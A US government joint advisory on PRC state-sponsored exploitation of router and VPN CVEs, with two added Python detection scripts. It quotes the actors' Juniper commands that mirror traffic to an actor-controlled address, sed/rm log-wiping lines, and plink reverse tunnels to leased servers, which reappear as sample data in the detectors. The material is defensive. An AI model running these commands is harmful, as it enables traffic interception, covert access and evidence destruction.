Original release date: June 7, 2022
Summary
Best Practices
• Apply patches as soon as possible
• Disable unnecessary ports and protocols
• Replace end-of-life infrastructure
• Implement a centralized patch management system
This joint Cybersecurity Advisory describes the ways in which People’s Republic of China (PRC) state-sponsored cyber actors continue to exploit publicly known vulnerabilities in order to establish a broad network of compromised infrastructure. These actors use the network to exploit a wide variety of targets worldwide, including public and private sector organizations. The advisory details the targeting and compromise of major telecommunications companies and network service providers and the top vulnerabilities—primarily Common Vulnerabilities and Exposures (CVEs)—associated with network devices routinely exploited by the cyber actors since 2020.
This joint Cybersecurity Advisory was coauthored by the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI). It builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal, and territorial (SLTT) government; critical infrastructure (CI), including the Defense Industrial Base (DIB); and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).
Entities can mitigate the vulnerabilities listed in this advisory by applying the available patches to their systems, replacing end-of-life infrastructure, and implementing a centralized patch management program.
NSA, CISA, and the FBI urge U.S. and allied governments, CI, and private industry organizations to apply the recommendations listed in the Mitigations section and Appendix A: Vulnerabilities to increase their defensive posture and reduce the risk of PRC state-sponsored malicious cyber actors affecting their critical networks.
For more information on PRC state-sponsored malicious cyber activity, see CISA’s China Cyber Threat Overview and Advisories webpage.
Common vulnerabilities exploited by People’s Republic of China state-sponsored cyber actors
PRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. Network devices, such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices, serve as additional access points to route command and control (C2) traffic and act as midpoints to conduct network intrusions on other entities. Over the last few years, a series of high-severity vulnerabilities for network devices provided cyber actors with the ability to regularly exploit and gain access to vulnerable infrastructure devices. In addition, these devices are often overlooked by cyber defenders, who struggle to maintain and keep pace with routine software patching of Internet-facing services and endpoint devices.
Since 2020, PRC state-sponsored cyber actors have conducted widespread campaigns to rapidly exploit publicly identified security vulnerabilities, also known as common vulnerabilities and exposures (CVEs). This technique has allowed the actors to gain access into victim accounts using publicly available exploit code against virtual private network (VPN) services [T1133] or public facing applications [T1190]—without using their own distinctive or identifying malware—so long as the actors acted before victim organizations updated their systems.
PRC state-sponsored cyber actors typically conduct their intrusions by accessing compromised servers called hop points from numerous China-based Internet Protocol (IP) addresses resolving to different Chinese Internet service providers (ISPs). The cyber actors typically obtain the use of servers by leasing remote access directly or indirectly from hosting providers. They use these servers to register and access operational email accounts, host C2 domains, and interact with victim networks. Cyber actors use these hop points as an obfuscation technique when interacting with victim networks.
These cyber actors are also consistently evolving and adapting tactics to bypass defenses. NSA, CISA, and the FBI have observed state-sponsored cyber actors monitoring network defenders’ accounts and actions, and then modifying their ongoing campaign as needed to remain undetected. Cyber actors have modified their infrastructure and toolsets immediately following the release of information related to their ongoing campaigns. PRC state-sponsored cyber actors often mix their customized toolset with publicly available tools, especially by leveraging tools that are native to the network environment, to obscure their activity by blending into the noise or normal activity of a network.
NSA, CISA, and the FBI consider the common vulnerabilities and exposures (CVEs) listed in Table 1 to be the network device CVEs most frequently exploited by PRC state-sponsored cyber actors since 2020.
Table 1: Top network device CVEs exploited by PRC state-sponsored cyber actors
Vendor   | CVE            | Vulnerability Type
Cisco    | CVE-2018-0171  | Remote Code Execution (RCE)
Cisco    | CVE-2019-15271 | RCE
Cisco    | CVE-2019-1652  | RCE
Citrix   | CVE-2019-19781 | RCE
DrayTek  | CVE-2020-8515  | RCE
D-Link   | CVE-2019-16920 | RCE
Fortinet | CVE-2018-13382 | Authentication Bypass
MikroTik | CVE-2018-14847 | Authentication Bypass
Netgear  | CVE-2017-6862  | RCE
Pulse    | CVE-2019-11510 | Authentication Bypass
Pulse    | CVE-2021-22893 | RCE
QNAP     | CVE-2019-7192  | Privilege Elevation
QNAP     | CVE-2019-7193  | Remote Inject
QNAP     | CVE-2019-7194  | XML Routing Detour Attack
QNAP     | CVE-2019-7195  | XML Routing Detour Attack
Zyxel    | CVE-2020-29583 | Authentication Bypass
Telecommunications and network service provider targeting
PRC state-sponsored cyber actors frequently use open-source tools for reconnaissance and vulnerability scanning. The actors have used the open-source, router-specific frameworks RouterSploit and RouterScan [T1595.002] to identify makes, models, and known vulnerabilities for further investigation and exploitation. The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. RouterScan is an open-source tool that scans ranges of IP addresses for vulnerable devices. These tools enable exploitation of SOHO and other routers manufactured by major industry providers, including Cisco, Fortinet, and MikroTik.
Upon gaining an initial foothold into a telecommunications organization or network service provider, PRC state-sponsored cyber actors have identified critical users and infrastructure including systems critical to maintaining the security of authentication, authorization, and accounting. After identifying a critical Remote Authentication Dial-In User Service (RADIUS) server, the cyber actors gained credentials to access the underlying Structured Query Language (SQL) database [T1078] and utilized SQL commands to dump the credentials [T1555], which contained both cleartext and hashed passwords for user and administrative accounts.
Having gained credentials from the RADIUS server, PRC state-sponsored cyber actors used those credentials with custom automated scripts to authenticate to a router via Secure Shell (SSH), execute router commands, and save the output [T1119]. These scripts targeted Cisco and Juniper routers and saved the output of the executed commands, including the current configuration of each router. After successfully capturing the command output, these configurations were exfiltrated off network to the actor’s infrastructure [TA0010]. The cyber actors likely used additional scripting to further automate the exploitation of medium to large victim networks, where routers and switches are numerous, to gather massive numbers of router configurations that would be necessary to successfully manipulate traffic within the network.
Armed with valid accounts and credentials from the compromised RADIUS server and the router configurations, the cyber actors returned to the network and used their access and knowledge to successfully authenticate and execute router commands to surreptitiously route [T1599], capture [T1020.001], and exfiltrate traffic out of the network to actor-controlled infrastructure.
While other manufacturers likely have similar commands, the cyber actors executed the following commands on a Juniper router to perform initial tunnel configuration for eventual exfiltration out of the network:
set chassis fpc <slot number> pic <user defined value> tunnel-services bandwidth <user defined value>
set chassis network-services all-ethernet
set interfaces <interface-id> unit <unit number> tunnel source <local network IP address>
set interfaces <interface-id> unit <unit number> tunnel destination <actor controlled IP address>
After establishing the tunnel, the cyber actors configured the local interface on the device and updated the routing table to route traffic to actor-controlled infrastructure.
set interfaces <interface-id> unit <unit number> family inet address <local network IP address subnet>
set routing-options static route <local network IP address> next-hop <actor controlled IP address>
PRC state-sponsored cyber actors then configured port mirroring to copy all traffic to the local interface, which was subsequently forwarded through the tunnel out of the network to actor-controlled infrastructure.
set firewall family inet filter <filter name> term <filter variable> then port-mirror
set forwarding-options port-mirroring input rate 1
set forwarding-options port-mirroring family inet output interface <interface-id> next-hop <local network IP address>
set forwarding-options port-mirroring family inet output no-filter-check
set interfaces <interface-id> unit <unit number> family inet filter input <filter name>
set interfaces <interface-id> unit <unit number> family inet filter output <filter name>
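The sequence above (tunnel services, a tunnel to an external destination, a static route to that destination, and a port-mirroring filter whose output leaves through the tunnel) can be audited from a saved Junos configuration. The following script is an added example, not part of the advisory or any vendor tool: it reads the output of `show configuration | display set`, applies one regular expression per step of the pattern, and rates the combination of "traffic copied" plus "path to an external address" as the high-signal case. The internal prefixes (10.0.0.0/8 and 192.168.0.0/16), the sample configuration, and the 203.0.113.5 "actor" address are constructed for illustration.

```python
"""Audit a Junos configuration (as 'show configuration | display set' output) for
the traffic-redirection pattern: tunnel services, a tunnel whose far end is
outside the network, a static route to an external next-hop, and port mirroring
whose output is sent out through that tunnel.

Added example, not part of the advisory. INTERNAL_PREFIXES, SAMPLE_CONFIG and the
203.0.113.5 address are constructed assumptions for illustration.
"""
import ipaddress
import re
from typing import Dict, List

# Assumption: addresses inside these prefixes belong to us; anything else is external.
INTERNAL_PREFIXES = [ipaddress.ip_network("10.0.0.0/8"),
                     ipaddress.ip_network("192.168.0.0/16")]

TUNNEL_SVC = re.compile(r"^set chassis fpc \S+ pic \S+ tunnel-services")
TUNNEL_DST = re.compile(r"^set interfaces (\S+) unit (\d+) tunnel destination (\S+)")
STATIC_NH = re.compile(r"^set routing-options static route (\S+) next-hop (\S+)")
MIRROR_FILTER = re.compile(r"^set firewall family inet filter (\S+) term \S+ then port-mirror")
MIRROR_OUT = re.compile(r"^set forwarding-options port-mirroring family inet output interface (\S+)")
NO_FILTER_CHECK = re.compile(r"^set forwarding-options port-mirroring family inet output no-filter-check")
FILTER_APPLY = re.compile(r"^set interfaces (\S+) unit (\d+) family inet filter (input|output) (\S+)")


def is_internal(addr: str) -> bool:
    """True if addr parses as an IP address inside one of INTERNAL_PREFIXES."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in INTERNAL_PREFIXES)


def audit_junos_config(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per suspicious 'set' line.

    Two passes are needed: 'display set' prints the interfaces hierarchy before
    firewall, so a filter is applied to an interface before the line defining it.
    """
    lines = [ln.strip() for ln in lines if ln.strip()]
    mirror_filters = {m.group(1) for ln in lines if (m := MIRROR_FILTER.match(ln))}

    findings = []
    for line in lines:
        if TUNNEL_SVC.match(line):
            findings.append({"rule": "tunnel-services-enabled", "line": line})
        if (m := TUNNEL_DST.match(line)) and not is_internal(m.group(3)):
            findings.append({"rule": "tunnel-destination-external", "line": line})
        if (m := STATIC_NH.match(line)) and not is_internal(m.group(2)):
            findings.append({"rule": "static-route-external-next-hop", "line": line})
        if MIRROR_FILTER.match(line):
            findings.append({"rule": "port-mirror-filter-defined", "line": line})
        if MIRROR_OUT.match(line):
            findings.append({"rule": "port-mirror-output", "line": line})
        if NO_FILTER_CHECK.match(line):
            findings.append({"rule": "port-mirror-no-filter-check", "line": line})
        if (m := FILTER_APPLY.match(line)) and m.group(4) in mirror_filters:
            findings.append({"rule": "port-mirror-filter-applied", "line": line})
    return findings


def severity(findings: List[Dict[str, str]]) -> str:
    """'high' when traffic is both copied (mirrored) and given a path to an external address."""
    rules = {f["rule"] for f in findings}
    exfil_path = rules & {"tunnel-destination-external", "static-route-external-next-hop"}
    capture = rules & {"port-mirror-output", "port-mirror-filter-applied"}
    if exfil_path and capture:
        return "high"
    return "medium" if rules else "none"


# Constructed sample: one legitimate interface plus the redirection pattern.
SAMPLE_CONFIG = """
set system host-name edge-rtr-1
set interfaces ge-0/0/0 unit 0 family inet address 10.1.1.1/24
set chassis fpc 0 pic 0 tunnel-services bandwidth 1g
set chassis network-services all-ethernet
set interfaces gr-0/0/0 unit 0 tunnel source 10.1.1.1
set interfaces gr-0/0/0 unit 0 tunnel destination 203.0.113.5
set interfaces gr-0/0/0 unit 0 family inet address 10.99.99.1/30
set routing-options static route 10.99.99.0/30 next-hop 203.0.113.5
set firewall family inet filter MIRROR term 1 then port-mirror
set forwarding-options port-mirroring input rate 1
set forwarding-options port-mirroring family inet output interface gr-0/0/0.0 next-hop 10.99.99.2
set forwarding-options port-mirroring family inet output no-filter-check
set interfaces ge-0/0/0 unit 0 family inet filter input MIRROR
set interfaces ge-0/0/0 unit 0 family inet filter output MIRROR
"""

if __name__ == "__main__":
    found = audit_junos_config(SAMPLE_CONFIG.splitlines())
    for f in found:
        print(f"{f['rule']:32} {f['line']}")
    print("severity:", severity(found))
```

A legitimate GRE tunnel to a partner will trip the tunnel rules on its own, which is why they are only "medium" until port mirroring is also present; run the audit against a known-good configuration first and add approved tunnel peers to the internal list rather than suppressing the rules.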
Having completed their configuration changes, the cyber actors often modified and/or removed local log files to destroy evidence of their activity to further obfuscate their presence and evade detection.
sed -i -e '/<REGEX>/d' <log filepath 1>
sed -i -e '/<REGEX>/d' <log filepath 2>
sed -i -e '/<REGEX>/d' <log filepath 3>
rm -f <log filepath 4>
rm -f <log filepath 5>
rm -f <log filepath 6>
PRC state-sponsored cyber actors also utilized command line utility programs like PuTTY Link (Plink) to establish SSH tunnels [T1572] between internal hosts and leased virtual private server (VPS) infrastructure. These actors often conducted system network configuration discovery [T1016.001] on these host networks by sending hypertext transfer protocol (HTTP) requests to C2 infrastructure in order to illuminate the external public IP address.
plink.exe -N -R <local port>:<host 1>:<remote port> -pw <user defined password> -batch root@<VPS1> -P <remote SSH port>
plink.exe -N -R <local port>:<host 2>:<remote port> -pw <user defined password> -batch root@<VPS2> -P <remote SSH port>
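Both host-level behaviours above leave a recognisable shape in process command lines: in-place `sed` deletions or `rm` against log files on the device, and a Plink invocation with `-R` (reverse tunnel), `-pw` (password on the command line) and `root@` on a leased server. The following script is an added example, not part of the advisory, that classifies command lines collected from shell auditing or process-creation telemetry. It also treats OpenSSH `ssh -R` as the same technique, which goes beyond the Plink case the advisory describes. The sample command lines, host addresses and 203.0.113.x servers are constructed.

```python
"""Classify process command lines for log tampering (sed -i '/.../d', rm on log
files) and reverse SSH tunnels (plink.exe -R ... root@<vps>, ssh -R ...).

Added example, not part of the advisory. SAMPLE_EVENTS, the hosts and the
203.0.113.x addresses are constructed assumptions.
"""
import re
import shlex
from typing import List, Tuple

LOG_DIRS = ("/var/log/", "/var/adm/")
LOG_NAMES = {"wtmp", "btmp", "lastlog", "messages", "secure", "auth.log", "syslog"}
SED_DELETE = re.compile(r"^/.*/d$")           # sed address plus delete command: /REGEX/d
TUNNEL_TOOLS = {"plink", "plink.exe", "ssh", "ssh.exe"}


def looks_like_log(path: str) -> bool:
    """Heuristic: under a log directory, a well-known log name, or a *.log file."""
    p = path.replace("\\", "/")
    name = p.rsplit("/", 1)[-1]
    return p.startswith(LOG_DIRS) or name in LOG_NAMES or name.endswith(".log")


def classify_command(cmdline: str) -> List[str]:
    """Return tags for one command line; an empty list means nothing matched."""
    windows = ".exe" in cmdline.lower()
    try:
        # Non-POSIX splitting keeps backslashes in Windows paths intact.
        argv = shlex.split(cmdline, posix=not windows)
    except ValueError:                         # unbalanced quotes: still worth a look
        return ["unparseable-command-line"]
    if not argv:
        return []
    prog = re.split(r"[\\/]", argv[0])[-1].strip('"').lower()
    args = argv[1:]
    positional = [a for a in args if not a.startswith("-")]
    tags = []

    if prog == "sed":
        in_place = any(a.startswith("-i") or a == "--in-place" for a in args)
        deletes = any(SED_DELETE.match(a.strip("'\"")) for a in args)
        if in_place and deletes and any(looks_like_log(a) for a in positional):
            tags.append("log-line-deletion")
    elif prog == "rm":
        if any(looks_like_log(a) for a in positional):
            tags.append("log-file-removal")
    elif prog in TUNNEL_TOOLS:
        if "-R" in args:
            tags.append("reverse-ssh-tunnel")
        if "-pw" in args:
            tags.append("password-on-command-line")
        if any(a.startswith("root@") for a in positional):
            tags.append("remote-root-login")
    return tags


def audit_command_lines(cmdlines: List[str]) -> List[Tuple[str, List[str]]]:
    """Return (command line, tags) for every line that matched at least one rule."""
    hits = []
    for c in cmdlines:
        tags = classify_command(c)
        if tags:
            hits.append((c, tags))
    return hits


# Constructed sample telemetry: the patterns from the advisory mixed with benign commands.
SAMPLE_EVENTS = [
    "sed -i -e '/10.1.1.50/d' /var/log/auth.log",
    "sed -i -e '/203.0.113.5/d' /var/log/messages",
    "rm -f /var/log/wtmp",
    "rm -f /tmp/build-cache",
    "sed -e 's/foo/bar/' /etc/motd",
    "plink.exe -N -R 3389:10.1.1.20:3389 -pw Passw0rd -batch root@203.0.113.10 -P 2222",
    "ssh -N -R 8080:localhost:80 user@203.0.113.11",
    "ssh user@10.1.1.5",
]

if __name__ == "__main__":
    for cmd, tags in audit_command_lines(SAMPLE_EVENTS):
        print(", ".join(tags).ljust(60), cmd)
```

On a router or Linux host the `sed`/`rm` rules need shell auditing (auditd execve records or an equivalent) to see the command line at all; that is the practical reason the advisory recommends logging configuration changes and infrastructure access centrally, where the actor cannot edit the record afterwards.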
Mitigations
NSA, CISA, and the FBI urge organizations to apply the following recommendations as well as the mitigation and detection recommendations in Appendix A, which are tailored to observed tactics and techniques. While some vulnerabilities have specific additional mitigations below, the following mitigations generally apply:
- Keep systems and products updated and patched as soon as possible after patches are released [D3-SU]. Consider leveraging a centralized patch management system to automate and expedite the process.
- Immediately remove or isolate suspected compromised devices from the network [D3-ITF] [D3-OTF].
- Segment networks to limit or block lateral movement [D3-NI].
- Disable unused or unnecessary network services, ports, protocols, and devices [D3-ACH] [D3-ITF] [D3-OTF].
- Enforce multifactor authentication (MFA) for all users, without exception [D3-MFA].
- Enforce MFA on all VPN connections [D3-MFA]. If MFA is unavailable, enforce password complexity requirements [D3-SPP].
- Implement strict password requirements, enforcing password complexity, changing passwords at a defined frequency, and performing regular account reviews to ensure compliance [D3-SPP].
- Perform regular data backup procedures and maintain up-to-date incident response and recovery procedures.
- Disable external management capabilities and set up an out-of-band management network [D3-NI].
- Isolate Internet-facing services in a network Demilitarized Zone (DMZ) to reduce the exposure of the internal network [D3-NI].
- Enable robust logging of Internet-facing services and monitor the logs for signs of compromise [D3-NTA] [D3-PM].
- Ensure that you have dedicated management systems [D3-PH] and accounts for system administrators. Protect these accounts with strict network policies [D3-UAP].
- Enable robust logging and review of network infrastructure accesses, configuration changes, and critical infrastructure services performing authentication, authorization, and accounting functions [D3-PM].
- Upon responding to a confirmed incident within any portion of a network, response teams should scrutinize network infrastructure accesses, evaluate potential lateral movement to network infrastructure and implement corrective actions commensurate with their findings.
Resources
Refer to us-cert.cisa.gov/china, https://www.ic3.gov/Home/IndustryAlerts, and https://www.nsa.gov/cybersecurity-guidance for previous reporting on People’s Republic of China state-sponsored malicious cyber activity.
U.S. government and critical infrastructure organizations should consider signing up for CISA’s cyber hygiene services, including vulnerability scanning, to help reduce exposure to threats.
U.S. Defense Industrial Base (DIB) organizations should consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System (PDNS) services, vulnerability scanning, and threat intelligence collaboration. For more information on eligibility criteria and how to enroll in these services, email dib_defense@cyber.nsa.gov.
Additional References
- CISA (2022), Weak Security Controls and Practices Routinely Exploited for Initial Access. https://www.cisa.gov/uscert/ncas/alerts/aa22-137a
- CISA (2022) 2021 Top Routinely Exploited Vulnerabilities. https://www.cisa.gov/uscert/ncas/alerts/aa22-117a
- NSA (2021), Selecting and Hardening Remote Access VPN Solutions. https://media.defense.gov/2021/Sep/28/2002863184/-1/-1/0/CSI_SELECTING-HARDENING-REMOTE-ACCESS-VPNS-20210928.PDF
- NSA (2021), Chinese State-Sponsored Cyber Operations: Observed TTPs. https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/0/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF
- CISA (2021), Exploitation of Pulse Connect Secure Vulnerabilities. https://www.cisa.gov/uscert/ncas/alerts/aa21-110a
- NSA (2020), Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities. https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF
- CISA (2020), Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity. https://www.cisa.gov/uscert/ncas/alerts/aa20-258a
- NSA (2020), Performing Out-of-Band Network Management. https://media.defense.gov/2020/Sep/17/2002499616/-1/-1/0/PERFORMING_OUT_OF_BAND_NETWORK_MANAGEMENT20200911.PDF
- CISA (2020), Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP. https://www.cisa.gov/uscert/ncas/alerts/aa20-020a
- NSA (2019), Mitigating Recent VPN Vulnerabilities. https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/Mitigating%20Recent%20VPN%20Vulnerabilities%20-%20Copy.pdf
- NSA (2019), Update and Upgrade Software Immediately. https://media.defense.gov/2019/Sep/09/2002180319/-1/-1/0/Update%20and%20Upgrade%20Software%20Immediately.docx%20-%20Copy.pdf
Contact Information
To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov. To report computer intrusion or cybercrime activity related to information found in this advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch at 855-292-3937 or by email at CyWatch@fbi.gov. For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov.
Disclaimer of endorsement
The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.
Purpose
This advisory was developed by NSA, CISA, and the FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.
Appendix A: Vulnerabilities
Table 2: Information on Cisco CVE-2018-0171
Table 3: Information on Cisco CVE-2019-15271
Cisco CVE-2019-15271 CVSS 3.0: 8.8 (High)
Vulnerability Description
A vulnerability in the web-based management interface of certain Cisco Small Business RV Series Routers could allow an authenticated, remote attacker to execute arbitrary commands with root privileges. The attacker must have either a valid credential or an active session token. The vulnerability is due to lack of input validation of the HTTP payload. An attacker could exploit this vulnerability by sending a malicious HTTP request to the web-based management interface of the targeted device. A successful exploit could allow the attacker to execute commands with root privileges.
Recommended Mitigations
- Cisco has released free software updates that address the vulnerability described in this advisory.
- Cisco fixed this vulnerability in firmware releases 4.2.3.10 and later for the Cisco RV042 Dual WAN VPN Router and RV042G Dual Gigabit WAN VPN Router.
- Administrators can reduce the attack surface by disabling the Remote Management feature if there is no operational requirement to use it. Note that the feature is disabled by default.
Detection Methods
Vulnerable Technologies and Versions
This vulnerability affects the following Cisco Small Business RV Series Routers if they are running a firmware release earlier than 4.2.3.10:
- RV016 Multi-WAN VPN Router
- RV042 Dual WAN VPN Router
- RV042G Dual Gigabit WAN VPN Router
- RV082 Dual WAN VPN Router
References
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-sbrv-cmd-x
Table 4: Information on Cisco CVE-2019-1652
Table 5: Information on Citrix CVE-2019-19781
Citrix CVE-2019-19781 CVSS 3.0: 9.8 (Critical)
Vulnerability Description
An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow directory traversal.
Recommended Mitigations
- Implement the appropriate refresh according to the vulnerability details outlined by the vendor: Citrix: Mitigation Steps for CVE-2019-19781.
- If possible, only allow the VPN to communicate with known Internet Protocol (IP) addresses (allow-list).
Detection Methods
- CISA has developed a free detection tool for this vulnerability: cisa.gov/check-cve-2019-19781: Test a host for susceptibility to CVE-2019-19781.
- Nmap developed a script that can be used with the port scanning engine: CVE-2019-19781 – Citrix ADC Path Traversal #1893.
- Citrix also developed a free tool for detecting compromises of Citrix ADC Appliances related to CVE-2019-19781: Citrix / CVE-2019-19781: IOC Scanner for CVE-2019-19781.
- CVE-2019-19781 is commonly exploited to install web shell malware. The National Security Agency (NSA) provides guidance on detecting and preventing web shell malware at https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF and signatures at https://github.com/nsacyber/Mitigating-Web-Shells.
Vulnerable Technologies and Versions
The vulnerability affects the following Citrix product versions on all supported platforms:
- Citrix ADC and Citrix Gateway version 13.0 all supported builds before 13.0.47.24
- NetScaler ADC and NetScaler Gateway version 12.1 all supported builds before 12.1.55.18
- NetScaler ADC and NetScaler Gateway version 12.0 all supported builds before 12.0.63.13
- NetScaler ADC and NetScaler Gateway version 11.1 all supported builds before 11.1.63.15
- NetScaler ADC and NetScaler Gateway version 10.5 all supported builds before 10.5.70.12
- Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b
References
https://support.citrix.com/article/CTX267027
Table 6: Information on DrayTek CVE-2020-8515
DrayTek CVE-2020-8515 CVSS 3.0: 9.8 (Critical)
Vulnerability Description
DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1.
Recommended Mitigations
- Users of affected models should upgrade to firmware 1.5.1 or later as soon as possible; the updated firmware addresses this issue.
- Disable remote access on your router if you do not need it.
- Disable remote access (admin) and SSL VPN. The ACL does not apply to SSL VPN connections (port 443), so you should also temporarily disable SSL VPN until you have updated the firmware.
- Always back up your configuration before doing an upgrade.
- After upgrading, check that the web interface now shows the new firmware version.
- Enable syslog logging to monitor for abnormal events.
Detection Methods
- Check that no additional remote access profiles (VPN dial-in, teleworker, or LAN-to-LAN) or admin users (for router administration) have been added.
- Check whether any access control lists (ACLs) have been altered.
Vulnerable Technologies and Versions
- This vulnerability affects the Vigor3900/2960/300B before firmware version 1.5.1.
References
https://draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/
http://packetstormsecurity.com/files/156979/DrayTek-Vigor2960-Vigor3900-Vigor300B-Remote-Command-Execution.html
https://sku11army.blogspot.com/2020/01/draytek-unauthenticated-rce-in-draytek.html
Table 7: Information on D-Link CVE-2019-16920
D-Link CVE-2019-16920 CVSS 3.0: 9.8 (Critical)
Vulnerability Description
Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends arbitrary input to a "PingTest" device common gateway interface (CGI), which leads to command injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.
Recommended Mitigations
- Replace affected devices with ones that are currently supported by the vendor. End-of-life devices should not be used.
Detection Methods
- HTTP packet inspection to look for arbitrary input to the "ping_test" command.
Vulnerable Technologies and Versions
- DIR-655C, DIR-866L, DIR-652, DHP-1565, DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825
References
https://www.kb.cert.org/vuls/id/766427
https://fortiguard.com/zeroday/FG-VD-19-117
https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3
https://www.seebug.org/vuldb/ssvid-98079
Table 8: Information on Fortinet CVE-2018-13382
Fortinet CVE-2018-13382 CVSS 3.0: 7.5 (High)
Vulnerability Description
An improper authorization vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8, and 5.4.1 to 5.4.10 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, and 1.0.0 to 1.0.7 under the SSL VPN web portal allows an unauthenticated attacker to modify the password of an SSL VPN web portal user via specially crafted HTTP requests.
Recommended Mitigations
- Upgrade to FortiOS versions 5.4.11, 5.6.9, 6.0.5, 6.2.0 or above and/or upgrade to FortiProxy version 1.2.9 or above or version 2.0.1 or above.
- SSL VPN users with local authentication can mitigate the impact by enabling two-factor authentication (2FA).
- Migrate SSL VPN user authentication from local to remote (LDAP or RADIUS).
- Disable the SSL VPN service entirely (both web mode and tunnel mode) with the following CLI commands:
  config vpn ssl settings
  unset source-interface
  end
Detection Methods
- HTTP packet inspection to look for specially crafted packets containing the magic key used for the SSL VPN password modification.
Vulnerable Technologies and Versions
This vulnerability affects the following products:
- Fortinet FortiOS 6.0.0 to 6.0.4
- Fortinet FortiOS 5.6.0 to 5.6.8
- Fortinet FortiOS 5.4.1 to 5.4.10
- Fortinet FortiProxy 2.0.0
- Fortinet FortiProxy 1.2.8 and below
- Fortinet FortiProxy 1.1.6 and below
- Fortinet FortiProxy 1.0.7 and below
FortiOS products are vulnerable only if the SSL VPN service (web mode or tunnel mode) is enabled and users authenticate locally.
References
https://fortiguard.com/psirt/FG-IR-18-389
https://fortiguard.com/advisory/FG-IR-18-389
https://www.fortiguard.com/psirt/FG-IR-20-231
Table 9: Information on MikroTik CVE-2018-14847
MikroTik CVE-2018-14847 CVSS 3.0: 9.1 (Critical)
Vulnerability Description
MikroTik RouterOS through 6.42 allows unauthenticated remote attackers to read arbitrary files and remote authenticated attackers to write arbitrary files due to a directory traversal vulnerability in the WinBox interface.
Recommended Mitigations
- Upgrade WinBox and RouterOS and change passwords.
- Firewall the WinBox port from the public interface and from untrusted networks.
Detection Methods
- Use the export command to see the full configuration and inspect it for abnormalities, such as unknown SOCKS proxy settings and scripts.
Vulnerable Technologies and Versions
This vulnerability affected the following MikroTik products:
- All bugfix releases from 6.30.1 to 6.40.7
- All current releases from 6.29 to 6.42
- All RC releases from 6.29rc1 to 6.43rc3
References
https://blog.mikrotik.com/security/winbox-vulnerability.html
Table 10: Information on Netgear CVE-2017-6862
Table 11: Information on Pulse CVE-2019-11510
Pulse CVE-2019-11510 CVSS 3.0: 10 (Critical)
Vulnerability Description
In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to exploit an arbitrary file read vulnerability.
Recommended Mitigations
- Upgrade to the latest Pulse Secure VPN.
- Stay alert to any scheduled tasks or unknown files/executables.
- Create detection/protection mechanisms that respond to directory traversal (/../../../) attempts to read local system files.
Detection Methods
- CISA developed a tool to help determine if IOCs exist in the log files of a Pulse Secure VPN Appliance for CVE-2019-11510: cisa.gov/check-your-pulse.
- Nmap developed a script that can be used with the port scanning engine: http-vuln-cve2019-11510.nse #1708.
Vulnerable Technologies and Versions
This vulnerability affects the following Pulse Connect Secure products:
- 9.0R1 to 9.0R3.3
- 8.3R1 to 8.3R7
- 8.2R1 to 8.2R12
References
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/
